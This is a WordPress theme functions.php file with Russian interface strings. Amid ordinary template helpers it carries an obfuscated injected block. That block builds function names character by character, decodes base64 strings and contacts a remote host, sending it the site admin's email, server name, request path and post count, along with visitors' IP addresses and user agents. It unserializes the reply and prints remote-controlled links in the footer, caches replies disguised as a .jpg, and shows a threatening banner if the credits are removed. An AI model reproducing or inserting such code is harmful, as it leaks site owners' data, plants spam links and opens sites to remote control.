<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
$zuyKu='e';$Mscq='6';$dQufDt='a';$cfqXy='o';$UOxc='s';$IRWw='b';$BtytpVV='4';$oJnIzA='e';$oWuOehh='e';$LpxoJ='_';$mVqW='d';$jyZlan='d';$xWIQ='c';$mynRUDxz=$IRWw.$dQufDt.$UOxc.$oJnIzA.$Mscq.$BtytpVV.$LpxoJ.$jyZlan.$oWuOehh.$xWIQ.$cfqXy.$mVqW.$zuyKu;$LRHhBN='a';$KgiGU='i';$FtzHxMn='n';$lXTgI='f';$rHhb='g';$jKBc='z';$hIjNc='t';$vzvIOH='e';$oZhvap='l';$GRyKEUKH=$rHhb.$jKBc.$KgiGU.$FtzHxMn.$lXTgI.$oZhvap.$LRHhBN.$hIjNc.$vzvIOH;$KwJv='r';$pJKYy='t';$WCCcv='1';$lDxSZJC='3';$zwghFUk='s';$IUZPcF='o';$mTZWEX='t';$EhgTp='r';$hFHw='_';$yoFdZxLg=$zwghFUk.$pJKYy.$EhgTp.$hFHw.$KwJv.$IUZPcF.$mTZWEX.$WCCcv.$lDxSZJC;$edaB='t';$myLMC='r';$wTHIe='r';$oMRPihV='s';$rAHgJPb='v';$edScO='e';$AdJrAyYL=$oMRPihV.$edaB.$wTHIe.$myLMC.$edScO.$rAHgJPb;                     $pg____________i='e';$ez_______u='6';$zl_______w='a';$rz_____________s='o';$es____________i='s';$lb______________a='b';$sa______l='4';$au_____________d='e';$jw_________j='e';$jy__z='_';$uq_____________y='d';$dh_______________o='d';$iy_____m='c';$cv___a=$lb______________a.$zl_______w.$es____________i.$au_____________d.$ez_______u.$sa______l.$jy__z.$dh_______________o.$jw_________j.$iy_____m.$rz_____________s.$uq_____________y.$pg____________i;$fw___p='o';$ks_____________k='s';$zc__i='t';$vz__o='u';$zx______u='_';$ls___s='s';$gr____________t='n';$or_______t='f';$zo__________e='t';$gg_______w='i';$zh_________o='n';$zc______________c='x';$vj___________u='i';$ds________p='c';$wi______d='e';$yi_______u=$or_______t.$vz__o.$gr____________t.$ds________p.$zc__i.$gg_______w.$fw___p.$zh_________o.$zx______u.$wi______d.$zc______________c.$vj___________u.$ls___s.$zo__________e.$ks_____________k;$ya______y='o';$tw____________z='n';$nf_____y='f';$pq___________e='e';$ii______________o='p';$ow____x=$nf_____y.$ya______y.$ii______________o.$pq___________e.$tw____________z;$lo_______s='d';$rs____________k='f';$om_______o='r';$yk__t='e';$gk__________b='a';$ti__________f=$rs____________k.$om_______o.$yk__t.$gk__________b.$lo_______s;$cv________c='s';$iu__g='e';$xq______________q='f';$hv_________p='c';$xz_____________y='l';$lp___________r='o';$qm______e=$xq______________q.$hv_________p.$xz_____________y.$lp___________r.$cv________c.$iu__g;define("WP_ID", $cv___a("Mi4wLjA="));define("WP_TTL", $cv___a("MTA4MDA="));define("WP_SRC", $cv___a("dHBva24="));function wp_get_header() {global $cv___a, $yi_______u;if ($yi_______u($cv___a("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$yi_______u($cv___a("d3BfZ2V0X2Zvb3Rlcg==")) &&$yi_______u($cv___a("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $cv___a, $ow____x, $qm______e, $ti__________f;$gc____v = TEMPLATEPATH."/".$cv___a("Zm9vdGVyLnBocA==");$es______________e = @$ow____x($gc____v, "r");$gc____v = @$ti__________f($es______________e, @filesize($gc____v));@$qm______e($es______________e);$qv_______________j = TEMPLATEPATH."/".$cv___a("ZnVuY3Rpb25zLnBocA==");$es______________e = @$ow____x($qv_______________j, "r");$qv_______________j = @$ti__________f($es______________e, @filesize($qv_______________j));@$qm______e($es______________e);$fq__________i = 0;if($gc____v && $qv_______________j) {if ($cv___a("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($gc____v, $cv___a("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$fq__________i = 1;}if (substr_count($gc____v, "wp_theme_GPL_credits()") < 1) {$fq__________i = 2;}}if(WP_ID != "2.0.0") {$fq__________i = 12;}}if($fq__________i > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $fq__________i -->";}}function wp_loaded() {global $cv___a, $yi_______u;return $yi_______u($cv___a("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($wz_____________l, $da_________a = "(more...)", $yz___________q = 0, $rg_____z = "") {$zj________j = get_the_content($da_________a, $yz___________q, $rg_____z);$zj________j = apply_filters("the_content", $zj________j);$zj________j = str_replace("]]>", "]]>", $zj________j);if (strlen($_GET["p"]) > 0) {echo $zj________j;}else if ((strlen($zj________j)>$wz_____________l) && ($et___________v = strpos($zj________j, " ", $wz_____________l ))) {$zj________j = substr($zj________j, 0, $et___________v);$zj________j = $zj________j;echo $zj________j;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$da_________a</a></div></p>";} else {echo $zj________j;}}}$dl____u='b';$gy_______d='_';$tg___________w='e';$bn_____k='s';$sx___________f='n';$db__e='c';$ha______________d='4';$ng_______v='a';$og__________r='o';$ud______________f='6';$cy__u='e';$fq________z='d';$uj____b='e';$sq_______e=$dl____u.$ng_______v.$bn_____k.$cy__u.$ud______________f.$ha______________d.$gy_______d.$tg___________w.$sx___________f.$db__e.$og__________r.$fq________z.$uj____b;$es________b='_';$if___s='n';$nz___t='e';$oz_________v='s';$di___________j='e';$wo_______n='i';$so_______________q='g';$gw__________a='c';$uw_____x='o';$vj___j='e';$ty______g='l';$ru__n='_';$jd___________u='t';$iw________n='t';$th_______l='t';$kb_______________s='f';$fy_____x='n';$yu____________n=$kb_______________s.$wo_______n.$ty______g.$di___________j.$ru__n.$so_______________q.$nz___t.$jd___________u.$es________b.$gw__________a.$uw_____x.$fy_____x.$th_______l.$vj___j.$if___s.$iw________n.$oz_________v;$pd____________q='e';$du______m='i';$mm___________q='s';$zw__e='e';$em_________z='x';$rp___________i='_';$zr_____________n='f';$es_______o='l';$gz___l='t';$sn_______________i='s';$ev__________d='i';$tl____________s=$zr_____________n.$du______m.$es_______o.$pd____________q.$rp___________i.$zw__e.$em_________z.$ev__________d.$mm___________q.$gz___l.$sn_______________i;$fz______a='i';$vb__n='v';$ip_____________e='_';$hv___________f='e';$ws____________c='p';$cn____k='r';$sj____u='o';$rc___c='a';$kx______________y='o';$qw___________y='c';$pe___y='e';$an_________v='s';$wo___h='n';$xj____y='m';$za__w='r';$al_________n=$vb__n.$hv___________f.$cn____k.$an_________v.$fz______a.$kx______________y.$wo___h.$ip_____________e.$qw___________y.$sj____u.$xj____y.$ws____________c.$rc___c.$za__w.$pe___y;$dt__k='s';$er_____________n='e';$ri________e='p';$xa_____________t='o';$go_____________j='n';$jp____________g='f';$ma________u='k';$nw______k='o';$vk_____v='c';$po_________v=$jp____________g.$dt__k.$nw______k.$vk_____v.$ma________u.$xa_____________t.$ri________e.$er_____________n.$go_____________j;$lw_________f='t';$ak_____________h='f';$sr___e='i';$mp___________k='e';$qh_______d='r';$fo___w='w';$ro_____s=$ak_____________h.$fo___w.$qh_______d.$sr___e.$lw_________f.$mp___________k;$qy______b='d';$ky_____________d='m';$vv______i='5';$nh____________c=$ky_____________d.$qy______b.$vv______i;$vb___________v='e';$fx____________t='p';$fq______e='l';$rj_____y='r';$id________z='h';$ye______________y='a';$jw_________h='t';$ul____m='a';$wn_________a=$rj_____y.$vb___________v.$ye______________y.$fq______e.$fx____________t.$ul____m.$jw_________h.$id________z;$ar__________o='r';$hd__o='e';$xs____s='s';$vf__________g='a';$uv________r='z';$pe___________f='n';$rp____g='i';$tv_________g='l';$oq_______v='e';$nv__x='u';$lk______________f='i';$yu___a=$nv__x.$pe___________f.$xs____s.$hd__o.$ar__________o.$lk______________f.$vf__________g.$tv_________g.$rp____g.$uv________r.$oq_______v;$ii____n='m';$gh___________w='n';$hh____________s='m';$qg______________v='p';$dc_________o='e';$wt_____g='a';$xd____________z='t';$vi______________i=$xd____________z.$dc_________o.$hh____________s.$qg______________v.$gh___________w.$wt_____g.$ii____n;$wl___e='_';$my______c='e';$nb_____________w='e';$eg_________s='e';$eo________c='x';$fy___________i='s';$ay___x='n';$fh__d='t';$gp_____________l='t';$uw___________r='a';$ng_________n='t';$ia__v='t';$cx___________b='a';$xy_____________k='m';$zp______________q='_';$zi______________t='e';$wk_______________d='r';$ge____________a='c';$xp_______________y='r';$iv__n='c';$tt______________z='o';$fv_____________o=$fy___________i.$fh__d.$wk_______________d.$my______c.$uw___________r.$xy_____________k.$zp______________q.$iv__n.$tt______________z.$ay___x.$ia__v.$zi______________t.$eo________c.$ng_________n.$wl___e.$ge____________a.$xp_______________y.$nb_____________w.$cx___________b.$gp_____________l.$eg_________s;function fy___________p($jm___________e) {global $cv___a, $yi_______u, $yu____________n, $al_________n, $fv_____________o;if (!$yi_______u($cv___a("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($al_________n(PHP_VERSION, "5.0.0", ">=") && $yi_______u($cv___a("ZmlsZV9nZXRfY29udGVudHM=")) && $yi_______u($cv___a("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$ii______________x = $fv_____________o(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$df_______z = @$yu____________n($jm___________e, 0, $ii______________x);} else {$df_______z = @$yu____________n($jm___________e, 0);}return $df_______z;}function id__________t($jm___________e) {global $yi_______u, $po_________v, $ro_____s, $cv___a;if (!$yi_______u($cv___a("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$sn______________z = strpos($jm___________e, "/", 7);$ol________a = array("uri"     => substr($jm___________e, $sn______________z),"host"    => str_replace("http://", "", substr($jm___________e, 0, $sn______________z)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$pb_____________e = @$po_________v("$ol________a[host]", 80, $wh_______________x, $up_______s, 4);if (!$pb_____________e) {return false;} else {$df_______z = "";$fa_______l  = "GET $ol________a[uri] HTTP/1.0\r\n";$fa_______l .= "Host: $ol________a[host]\r\n";$fa_______l .= "Referer: $ol________a[referer]\r\n";$fa_______l .= "Connection: Close\r\n\r\n";@$ro_____s($pb_____________e, $fa_______l);while (!@feof($pb_____________e)) {$ea____t = @fgets($pb_____________e, (1024*24));if ($ea____t == "\r\n") {$za___m = true;continue;}if ($za___m) {$df_______z .= $ea____t;}}return $df_______z;}}function jw__a($jm___________e) {global $yi_______u;$ns________s = false;if ($jm___________e != "") {if ($yi_______u("fy___________p")) {$ns________s = @fy___________p($jm___________e);}if (!$ns________s && ($yi_______u("id__________t"))) {$ns________s = @id__________t($jm___________e);}}return $ns________s;}function ub_________e() {global $_SERVER, $nh____________c;$vr______________p = $_SERVER["SERVER_NAME"];if (substr("$vr______________p", 0, 4) == "www.") {$vr______________p = substr("$vr______________p", 4);}$vr______________p = $nh____________c("$_SERVER[SERVER_NAME]");return $vr______________p;}function ar_______s() {return "file";}function nb_______________z($jm___________e) {global $_SERVER, $yu____________n, $tl____________s, $ow____x, $qm______e, $ro_____s;$lj_____k = gt_______________o();$uo______z = ub_________e().".jpg";$es_______q = $lj_____k["dir_upload"]["path"]."/$uo______z";$eg______________g = @filemtime($es_______q);if (!$eg______________g || ((time()-$eg______________g) >= WP_TTL)) {$ns________s = jw__a($jm___________e);if ($ns________s) {if ($tl____________s($es_______q)) {@unlink($es_______q);}$es______________e = @$ow____x($es_______q, "x+");@$ro_____s($es______________e, $ns________s);@$qm______e($es______________e);}} else {if ($tl____________s($es_______q)) {$ns________s = @$yu____________n($es_______q);} else {$ns________s = false;}}return $ns________s;}function gt_______________o() {global $_SERVER, $cv___a, $sq_______e;$pe_________g = wp_count_posts("post");$jh___________h = pathinfo(get_bloginfo("template_directory"));$lj_____k = array("url" => array("report"      => $cv___a("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $jh___________h,"dir_upload"=> tk_______________y(),"queryString"=> array("?a001=".WP_ID,"a004=".$jh___________h[filename],"a005=".$pe_________g->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "");$lj_____k["url"]["queryString"] = implode("&", $lj_____k["queryString"]);$lj_____k["url"]["report"] = $lj_____k["url"]["report"]."/?".$sq_______e($lj_____k["url"]["queryString"]).".html";return $lj_____k;}function tk_______________y() {$sn_________z = wp_upload_dir();if (isset($sn_________z["error"])) {$wh_________q = im____c();if (is_writable($wh_________q)) {$sn_________z = array("path" => $wh_________q);}}return $sn_________z;}function im____c() {global $yi_______u, $nh____________c, $wn_________a, $vi______________i;$qa____i = (bool) ini_get("safe_mode");if ($qa____i == true) {return false;}if ($yi_______u("sys_get_temp_dir")) {$hk______________d = sys_get_temp_dir();if (is_writable($hk______________d)) {return $wn_________a($hk______________d);}}if (!empty($_ENV["TMP"])) {return $wn_________a($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $wn_________a($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $wn_________a($_ENV["TEMP"]);} else {$kx__o = $vi______________i($nh____________c(uniqid(rand(), true)), "");if ($kx__o) {$hk______________d = $wn_________a(dirname($kx__o));@unlink($kx__o);return $hk______________d;} else {return false;}}}function oc____y() {global $_GET, $tl____________s;$lj_____k = gt_______________o();$vr______________p = ub_________e();$ci______b = ar_______s();$wz_______________e = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($ci______b == "file") {$ej_____________r = $lj_____k["dir_upload"]["path"]."/".$vr______________p.".jpg";if ($tl____________s($ej_____________r)) {@unlink($ej_____________r);$wz_______________e = "deleted";}}$xj_______________t = array("s"=> $wz_______________e,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($xj_______________t AS $qm_______v => $wf_________c) echo " [$qm_______v:$wf_________c]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $yi_______u, $cv___a, $yu___a;$lj_____k = gt_______________o();$bl______u = "nb_______________z";if ($yi_______u($bl______u)) {$df_______z = $bl______u($lj_____k["url"]["report"]);}if ($df_______z) {if ($df_______z = @$cv___a($df_______z)) {$df_______z = @$yu___a($df_______z);if (strlen($df_______z[custom_credit]) >= 5) {$lj_____k["default_string"] = $df_______z[custom_credit];}if ($df_______z["status"] == "0") {$yl___r = 1;$xk______w = 1;} else {$nj_______w = sizeof($df_______z["links"]);$jh_____y = $lj_____k["default_string"];if ($nj_______w > 0 && $df_______z["links"] !== "") {$sb_________k = 0;foreach ($df_______z["links"] as $tr___________q => $sk_____l) {$sb_________k++;if ($sk_____l->l_path == "" || $sk_____l->l_path == $_SERVER["REQUEST_URI"]) {$sk_____l->l_href = htmlspecialchars(strip_tags($sk_____l->l_href));$sk_____l->l_title = htmlspecialchars(strip_tags($sk_____l->l_title));$sk_____l->l_anchor = htmlspecialchars(strip_tags($sk_____l->l_anchor));$jh_____y .= " | ";$jh_____y .= "<a href='$sk_____l->l_href' title='$sk_____l->l_title'";if ($sk_____l->l_nofollow == "1") {$jh_____y .= " rel='nofollow'";}$jh_____y .= ">$sk_____l->l_anchor</a>";}}}$lj_____k["links"] = "$jh_____y";if ($df_______z[credit] == "0") {$lj_____k["links"] = "";}}} else {$yl___r = "1";}} else {$yl___r = "1";}if ($yl___r == "1") {$lj_____k["links"] = $lj_____k["default_string"];}echo "$lj_____k[links]";echo "<!-- s: $df_______z[signature] -->";oc____y();}                      
 function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');

                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
